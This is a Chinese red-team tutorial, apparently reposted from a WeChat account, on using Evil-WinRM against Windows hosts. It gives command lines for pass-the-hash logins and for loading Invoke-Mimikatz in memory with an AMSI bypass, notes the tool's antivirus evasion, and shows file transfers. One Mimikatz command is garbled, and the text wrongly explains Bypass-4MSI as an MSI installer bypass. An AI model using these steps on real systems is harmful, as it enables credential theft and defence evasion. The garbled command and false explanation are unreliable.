红队利器Evil-WinRM工具-WIndows渗透功能使用

admin 2024年12月27日12:32:22评论21 views字数 2648阅读8分49秒阅读模式

Evil-WinRM工具

由于传播、利用本公众号所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并且致歉。谢谢!

一、介绍

Evil-WinRM 是一个开源的使用ruby 语言开发渗透测试工具,由 Hackplayers 团队开发。

如果Windows主机启用了WinRM服务,那第一个想到的工具就是Evil-WinRM,在Kali Linux系统中Evil-WinRM工具是自带的,如果想要在Windows系统中使用到Evil-WinRM工具的话就要按照github链接进行环境配置与工具下载。

Evil-WinRM下载: https: //github.com/Hackplayers/evil-winrm

我之前一篇用到的工具就是这个Evil-WinRM,利用其SSL加密登录功能远程获取Windows的powershell

往期文章 : 教你黑进你朋友的电脑快来试试-物理hack

二、功能

(一)多种登录方式:Evil-WinRM 支持使用纯文本密码、SSL 加密登录、NTLM 哈希登录以及密钥登录等多种方式进行远程登录。

(二)文件传输:该工具支持文件上传和下载,且显示进度条

(三)执行 PowerShell 脚本:Evil-WinRM 允许用户在目标机器上执行 PowerShell 脚本,提供了 -s 参数来指定脚本路径。

(四)服务枚举:它可以列出目标系统中运行的服务,有助于识别可能存在安全漏洞的服务。

(五)日志存储:Evil-WinRM 提供了日志记录功能,方便用户追踪操作历史。

(六)绕过安全机制:Evil-WinRM 支持在内存中加载 PowerShell 脚本和可执行文件,有助于绕过某些反病毒软件的检测。

(七)动态 AMSI 绕过:为了避开反病毒软件的签名检测,Evil-WinRM 实现了动态 AMSI 绕过

(八)Kerberos 认证支持:Evil-WinRM 支持 Kerberos 认证,增强了在域环境中的认证能力。

(九)SSL 和证书支持:该工具支持 SSL 加密,可以安全地与远程主机通信。

(十)命令历史和补全:Evil-WinRM 提供了命令历史和自动补全功能,提高了使用效率。

(十一)本地文件/目录补全:支持本地文件和目录的自动补全,简化了文件操作。

三、帮助

evil-winrm语法

evil-winrm -h
Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]    -i, --ip IP                      远程主机IP或主机名(必填)    -P, --port PORT                  远程主机端口(默认为5985)    -u, --user USER                  用户名(必填)    -p, --password PASS              密码    -s, --scripts PS_SCRIPTS_PATH    Powershell脚本路径(必填)    -e, --executables EXES_PATH      C#可执行文件路径(必填)    -U, --url URL                    远程URL端点(默认为/wsman)    -V, --version                    显示版本信息    -h, --help                       显示帮助信息

四、使用

(一)开启Windows中的WinRm服务

1.使用管理员身份运行PowerShell

红队利器Evil-WinRM工具-WIndows渗透功能使用

2.开启WinRM 服务(远程控制服务)

先在WIFI属性中将公用网络配置为专用网络(否则无法开启服务)

红队利器Evil-WinRM工具-WIndows渗透功能使用
红队利器Evil-WinRM工具-WIndows渗透功能使用

在PowerShell中使用命令开启WinRM服务

enable-psremoting
红队利器Evil-WinRM工具-WIndows渗透功能使用

(二)纯文本密码登录

evil-winrm -i 192.168.3.24 -u 28374 -p XXXXXXXX
红队利器Evil-WinRM工具-WIndows渗透功能使用
image

 -i 参数 :目标主机地址

-u 参数 :目标系统用户名

-p 参数 :目标主机明文密码

  • 启用SSL

-S 参数可以启用SSL,将我们的数据通过加密的安全套接字层进行传输

evil-winrm -i 192.168.3.24 -u 28374 -p XXXXXXXX -S

(三)NTLM hash 哈希密码登录

evil-winrm -i 192.168.3.24 -u 28374 -H 32196B56FFE6F45E294117B91A83BF38

红队利器Evil-WinRM工具-WIndows渗透功能使用-H 参数 哈希密码登录

(四)PowerShell脚本加载

这里我们用Invoke-Mimiktz脚本到目标主机并将其加载到内存中

可以去到目标地址下载

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

红队利器Evil-WinRM工具-WIndows渗透功能使用
evil-winrm -i 192.168.3.24 -u 28374 -H 32196B56FFE6F45E294117B91A83BF38 -s /home/kali/oft/powBypass-4MSIInvoke-Mimikatz.ps1Invoke-Mimikatz

-s 参数 PowerShell脚本地址

Bypass-4MSI 用于绕过应用程序安装程序(MSI)相关安全限制的技术或命令。正常情况下,系统会通过各种安全机制来确保只有经过授权的、安全的 MSI 文件才能被安装,例如检查数字签名用户权限等。Bypass-4MSI 试图打破这些限制,这种技术如果被恶意利用,会使攻击者能够在目标系统上安装未经授权的软件,包括恶意软件。

红队利器Evil-WinRM工具-WIndows渗透功能使用

(五)Evil-WinRM存储日志

evil-winrm -i 192.168.3.24 -u 28374 -H 32196B56FFE6F45E294117B91A83BF38 -l
红队利器Evil-WinRM工具-WIndows渗透功能使用

-l 参数 : 将日志保存到本地主机文件系统中

后面在连接的PowerShell中的所有输出都会存到指定日志文件中。

(六)Evil-WinRM进行文件传输

  • 1.上传文件(向Windows上传)
upload /home/kali/oft/pow/nihao.txt
红队利器Evil-WinRM工具-WIndows渗透功能使用
  • 2.下载文件 (下载到Kali)
download nihao.txt /home/kali/oft/nihao.txt
红队利器Evil-WinRM工具-WIndows渗透功能使用

总结

在红队渗透Windows系统过程中Evil-WinRM是极好用的工具,绕过安全策略远程脚本执行木马传输等等

 

原文始发于微信公众号(泷羽Sec-Blanks):红队利器Evil-WinRM工具---WIndows渗透功能使用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月27日12:32:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队利器Evil-WinRM工具-WIndows渗透功能使用https://cn-sec.com/archives/3559773.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息